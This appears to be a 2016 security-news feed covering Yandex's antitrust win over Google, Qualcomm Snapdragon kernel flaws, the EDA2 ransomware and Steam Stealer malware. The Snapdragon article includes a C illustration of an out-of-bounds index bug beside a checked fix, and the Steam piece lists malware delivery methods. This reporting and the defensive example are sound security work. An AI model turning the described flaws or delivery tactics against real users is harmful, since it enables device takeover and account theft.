The Moscow Arbitration Court on Monday ruled that Google had abused its dominant position with the help of its free open source mobile platform "Android" by forcing its own apps and services, like YouTube, Google Maps and others, on users, reducing competition.
The complaint was brought against Google last February by competing search engine Yandex — Russian Counterpart of Google — which had argued that Google broke competition rules by requiring handset manufacturers to pre-install its apps on Android phones and tablets.
Yandex-1, Google-0
According to a survey conducted by Liveinternet in September 2013, Yandex accounted for 57.4% of the Russian search market, while Google held 34.9%. These figures were reflected in the stock market, where their shares were 62.2 and 26 percent respectively.
These statistics really worried Google about its operations in Russian cyberspace, and it soon rolled out its Plan B to gain widespread popularity in the Russian market by shipping Android smartphones with the Google Play Store as bloatware.
This, however, won Google only a modest position in the Russian market. But soon Yandex noticed that millions of smartphones in Russia shipped with the Android platform, which uses Google as the default search engine.
As Yandex ranked as the 4th largest search engine worldwide, the popularity of Android in Russia was already reflected in the Russian stock market, forcing Yandex to proceed with a lawsuit against Google in February 2015.
No Pre-installed Google Apps for Russians
The original ruling was handed down by the country's antitrust watchdog, the Federal Antimonopoly Service (FAS), last September over the pre-installed Google apps on Android and the blocking of other service providers.
Google appealed the ruling last year in an attempt to preserve its business practices in the Russian market.
However, yesterday (Tuesday) the Moscow Arbitration Court rejected the company's appeal, upholding FAS' judgment that Google's practices broke Russian law by leading to the 'prohibition of pre-installation of apps of other producers.'
FAS had already decided the case in favor of Yandex, the native search engine, helping it regain its dominance over foreign search engines.
FAS ordered that the default Android would no longer come with any pre-installed Google apps on Android smartphones and tablets in Russia.
Google will now be required to amend its contracts with OEMs in Russia to comply with the ruling. The company now faces having to restructure its contracts with manufacturers and pay a penalty based on its local earnings.
Is Yandex - An Unsung Hero?
There is already a buzz in cyber chat rooms that Yandex was a cloned product of Google, as is evident from many social discussion sites.
Yet Yandex had already developed, in its infancy, a unique method to search the whole Bible and Russian literature, which Google adopted later.
These are some of the hidden facts about Yandex:
Yandex launched as a search engine in 1997, a year earlier than Google.
Yandex also launched maps in 2004, Google a year later in 2005.
Yandex was the first to launch news search in 2000, Google in 2002.
Blog search came out of Russia in 2004, but out of California only in 2006.
Yandex had already launched an RSS aggregator in 2005, Google followed in 2006.
Even though Google has implemented many new ideas over time with the help of its think tanks, Yandex was behind the implementations of the earlier era.
Let's see what Yandex rolls out next after the thumbs-up from FAS.
More than a Billion Snapdragon-based Android Phones Vulnerable to Hacking
16.3.2016 Android
More than a billion Android devices are at risk from a severe vulnerability in the Qualcomm Snapdragon chip that could be exploited by any malicious application to gain root access on the device.
Security experts at Trend Micro are warning Android users of some severe programming blunders in Qualcomm's kernel-level Snapdragon code that, if exploited, can be used by attackers to gain root access and take full control of the device.
Gaining root access on a device is a matter of concern, as it grants attackers access to admin level capabilities, allowing them to turn your device against you to snap your pictures, and snoop on your personal data including accounts’ passwords, emails, messages and photos.
The company’s own website notes that Qualcomm Snapdragon SoCs (systems on a chip) power more than a Billion smart devices, including many Internet of Things (IoTs) as of today. Thus, the issue puts many people at risk of being attacked.
Although Google has pushed out updates, after Trend Micro privately reported the issues, that now prevent attackers from gaining root access with a specially crafted app, most users will not be getting those updates anytime soon.
The security update rolls out to your device through a long chain:
Qualcomm → Google → Your device's manufacturer → Your network carrier → Your handheld over the air
"Given that many of these devices are either no longer being patched or never received any patches in the first place," said Trend engineer Wish Wu, "they would essentially be left in an insecure state without any patch forthcoming."
Unfortunately, what is more concerning is the fact that the same vulnerable chips are used in a large number of IoT devices, which are no longer in line for security updates. This makes it possible for hackers to gain root access to these connected devices as well.
"Smartphones aren't the only problem here," said Trend's Noah Gamer. "Qualcomm also sells their SoCs to vendors producing devices considered part of the Internet of Things, meaning these gadgets are just as at risk."
"If IoT is going to be as widespread as many experts predict, there needs to be some sort of system in place ensuring these devices are safe for public use. Security updates are an absolute necessity these days, and users of these connected devices need to know what they're dealing with."
Whatever the reason, if security patches are not available for your device model or take too long to arrive, in both cases it gives miscreants time to exploit the security holes and gain control of your device.
However, users who chose Google's own handsets are lucky: those get their patches directly and automatically from the tech giant, making them safe from the vulnerabilities. The handsets include the Nexus 5X, Nexus 6P, Nexus 6, Nexus 5, Nexus 4, Nexus 7, Nexus 9, and Nexus 10.
All of the smart devices using the Qualcomm Snapdragon 800 series, including the 800, 805 and 810 and running a 3.10-version kernel are affected by the vulnerabilities.
The vulnerable code is present in Android version 4 to version 6. In their tests, the researchers found the Nexus 5, 6 and 6P, and the Samsung Galaxy Note Edge using vulnerable versions of Qualcomm's code.
Since the researchers do not have access to every Android handset and tablet for testing, the list of vulnerable devices is not exhaustive.
Since the researchers have not disclosed full details about the flaws, the short brief about the vulnerabilities is as follows:
1. Qualcomm-related flaw (CVE-2016-0819): The vulnerability has been described by the researchers as a logic bug that allows a small section of kernel memory to be tampered with after it is freed, causing an information leakage and a Use After Free issue in Android.
2. The flaw (CVE-2016-0805) is in Qualcomm chipset kernel function get_krait_evtinfo: The get_krait_evtinfo function returns an index into an array used by other kernel functions. With the help of carefully crafted input data, it is possible to generate a malicious index, leading to a buffer overflow.
3. Gaining root access: Using both the flaws together on vulnerable devices, attackers can gain root access on the device.
The researchers will disclose the full details of exactly how to leverage the bugs at the upcoming Hack In The Box security conference in the Netherlands to be held in late May 2016.
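The get_krait_evtinfo issue described above is an unchecked-index bug: an index derived from caller-controlled event configuration is handed to other functions that trust it. The C below is an added illustration of that bug class, not Qualcomm's or the Linux kernel's code; the table layout, the event-field encoding and every function name are constructed for the example. It places the unchecked derivation beside a checked one so the consumer never indexes the table with an out-of-range or aliased value.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed geometry: 4 event groups of 8 codes each (hypothetical). */
#define EVT_GROUPS      4
#define EVT_CODES       8
#define EVTINFO_ENTRIES (EVT_GROUPS * EVT_CODES)   /* 32 descriptors */

/* Constructed descriptor table: entry = group * 16 + code, so a wrong
 * index is easy to spot. Stands in for the array the real helper indexes. */
static const uint8_t evtinfo_table[EVTINFO_ENTRIES] = {
    0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,   /* group 0 */
    0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,   /* group 1 */
    0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27,   /* group 2 */
    0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,   /* group 3 */
};

/* Assumed encoding for this example: bits 11..8 carry the group, bits 7..0
 * the code. Both fields can hold more values than the table has. */
static unsigned evt_group(uint32_t event) { return (event >> 8) & 0xF; }
static unsigned evt_code(uint32_t event)  { return event & 0xFF; }

/* Vulnerable pattern: the index comes straight from the fields. A group
 * beyond EVT_GROUPS lands past the table; an oversized code stays inside
 * the table but aliases into the next group's row (wrong descriptor). */
int evtinfo_index_unchecked(uint32_t event)
{
    return (int)(evt_group(event) * EVT_CODES + evt_code(event));
}

/* Hardened pattern: validate each field against the table geometry before
 * forming the index, and signal failure rather than return a bad index. */
int evtinfo_index_checked(uint32_t event)
{
    unsigned group = evt_group(event), code = evt_code(event);
    if (group >= EVT_GROUPS || code >= EVT_CODES)
        return -1;                           /* reject; caller must not index */
    return (int)(group * EVT_CODES + code);
}

/* Consumer standing in for "other kernel functions": only ever indexes
 * through the checked helper. Returns false for an invalid event. */
bool lookup_evtinfo(uint32_t event, uint8_t *desc_out)
{
    int idx = evtinfo_index_checked(event);
    if (idx < 0)
        return false;
    *desc_out = evtinfo_table[idx];
    return true;
}

/* True when the unchecked derivation would read outside the table. */
bool unchecked_index_out_of_bounds(uint32_t event)
{
    int idx = evtinfo_index_unchecked(event);
    return idx < 0 || idx >= EVTINFO_ENTRIES;
}

int main(void)
{
    uint8_t desc = 0;
    printf("0x0305: checked index %d\n", evtinfo_index_checked(0x0305));
    printf("0x0F05: unchecked index %d, table has %d entries\n",
           evtinfo_index_unchecked(0x0F05), EVTINFO_ENTRIES);
    printf("0x0F05: checked lookup ok=%d\n", lookup_evtinfo(0x0F05, &desc));
    return 0;
}
```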
EDA2, derived from the educational ransomware, is easy to break
16.3.2016 Virus
The new strain of educational ransomware EDA2 is infecting systems in the wild, but experts discovered that it is quite easy to neutralize.
Do you remember the EDA2 ransomware?
It is one of the educational ransomware programs developed by the security expert Utku Sen. Now a new variant of the EDA2 educational ransomware has appeared in the wild, and the good news is that this variant is quite easy to neutralize.
The EDA2 ransomware encrypts victims' files using AES encryption, then appends the .locked extension to them. Like other ransomware, EDA2 also drops notes on the infected machines informing users that they need to pay 0.5 bitcoins to restore their files.
According to the experts at Bleeping Computer, the educational ransomware has already infected more than 650 machines, and analysis of the Bitcoin address associated with the ransom request revealed that only 3 victims have paid.
The crooks are targeting online gamers: the EDA2 educational ransomware spreads via a link associated with a YouTube video that explains how to crack the Far Cry Primal videogame. When victims try to execute the supposed crack file, they are infected by the ransomware, which encrypts their files.
The author of the malware in a bold manner writes in the note that he would never get caught by the authorities.
Utku Sen, the developer who created the educational ransomware, seems to have deliberately inserted security flaws in both Hidden Tear and EDA2 to sabotage cyber criminals using the proof-of-concept ransomware.
Sen's plan worked with Hidden Tear, allowing the recovery of files encrypted by the Linux.Encoder and Cryptear.B ransomware, but failed with EDA2.
The developer also inserted vulnerabilities in EDA2's control script in order to retrieve the decryption keys, allowing victims to restore their files.
The keys are then published online, giving victims the opportunity to restore their files by using the Hidden Tear Decryptor.
Other ransomware derived from the Hidden Tear educational code includes Magic, Linux.Encoder, and Cryptear.B; all of these threats were deliberately affected by a flaw that allows researchers to easily decrypt documents.
Malware targeting Steam accounts, a growing business
16.3.2016 Virus
Security experts published an interesting analysis of malware targeting the Steam gaming platform and the evolution of these threats over the last few years.
It is an emergency: malware targeting Steam accounts has been increasing as never before over the last few months. The popular gaming platform is a privileged target for cyber criminals; Steam is owned by Valve and accounts for nearly 140 million users. The company estimates that nearly 77,000 accounts are hijacked and pillaged each month.
“We see around 77,000 accounts hijacked and pillaged each month. These are not new or naïve users; these are professional CS:GO players, reddit contributors, item traders, etc. Users can be targeted randomly as part of a larger group or even individually. Hackers can wait months for a payoff, all the while relentlessly attempting to gain access. It’s a losing battle to protect your items against someone who steals them for a living.” states the company in a blog post.
Santiago Pontiroli, a security expert at Kaspersky Lab, and Bart P, an independent security researcher, published an interesting analysis of malware targeting the Steam gaming platform and the evolution of these threats over the last few years.
In recent months, the researchers observed a spike in infections caused by a data stealer specifically designed to target accounts on the gaming platform, dubbed Steam Stealer.
Steam Stealer first appeared on a forum in the Russian underground; it is advertised as a customizable threat that is offered for sale with upgrades and manuals.
“Adding new features is simple. The average developer just needs to select their favorite programming language and know just enough about Steam’s client design and protocol. There are many APIs and libraries available that interface seamlessly with the Steam platform, significantly reducing the effort required.” states the analysis.
The crooks usually spread the Steam Stealer malware via bogus websites or by sending direct messages to victims.
Steam Stealer is very cheap: the cost of a build ranges from $3 up to $30 USD, and some sellers offer it as a malware-as-a-service tool.
“However, when it comes to these types of malicious campaigns we usually see prices starting in the range of $500 dollars (taking as a reference earlier ransomware-as-a-service markets).” explained Pontiroli and Bart P.
The researchers noticed a significant difference in the way criminals delivered the malware over time. In the past they served the malware to users via URL shortening services, cloud storage services like Dropbox and Google Docs, and phony game servers and fake voice software sites. Recently attackers started using fake Chrome extensions and gambling sites.
A short rundown of past trends:
Use of obfuscators to make analysis and detection harder.
Use of file extensions hidden by default by Windows (fake ‘screensaver’ files).
Use of NetSupport added (providing remote access to the attacker).
Use of fake TeamSpeak servers.
Use of automatic Captcha bypass (DeathByCaptcha and others).
Use of fake game servers (Counter-Strike: Global Offensive most notably).
Use of Pastebin to fetch the actual Steam Stealer.
Use of fake screenshot sites impersonating Imgur, LightShot or SavePic.
Use of fake voice software impersonating TeamSpeak, RazerComms and others.
Use of URL shortening services like bit.ly.
Use of Dropbox, Google Docs, Copy.com and others to host the malware.
Current trends are as follows:
Use of fake Chrome extensions or JavaScript, scamming via gambling websites.
Use of fake gambling sites, including fake deposit bots.
Use of AutoIT wrappers to make analysis and detection harder.
Use of RATs (Remote Access Trojans) such as NanoCore or DarkComet.
The experts explained that there are countermeasures that Valve's Steam has implemented to prevent attacks on its accounts, including:
Two-factor authentication either by email or mobile application.
Blocking URLs throughout Steam.
Nickname censorship (Steam/Valve).
Captcha on trades (briefly), and then bypassed.
Limited accounts introduced.
Steam e-mail confirmations for utilizing the market and trading items.
Verifying e-mail address.
$5 USD purchase to combat ‘free abuse’ accounts (expanded on limited accounts).
Information about who you are trading with (record).
Market will become blocked when logging in from new devices, changing your profile password etc.
Steam mobile trade confirmations.
Steam account recovery via phone number.
Restrict chat from users who do not share a friend, game server, or multi-user chat relationship with you.
More restrictive block referral of spam and scam sites.
Trade hold duration (15 days).
The experts explained that Steam implemented the above measures as a deterrent.
“We have listed all the options Steam offers users to protect their accounts. Remember that cybercriminals aim for numbers and if it’s too much trouble they’ll move on to the next target. Follow these simple recommendations and you will avoid becoming the low hanging fruit.”
No doubt, the number of attacks against the platform will continue to increase despite the effort spent by the company.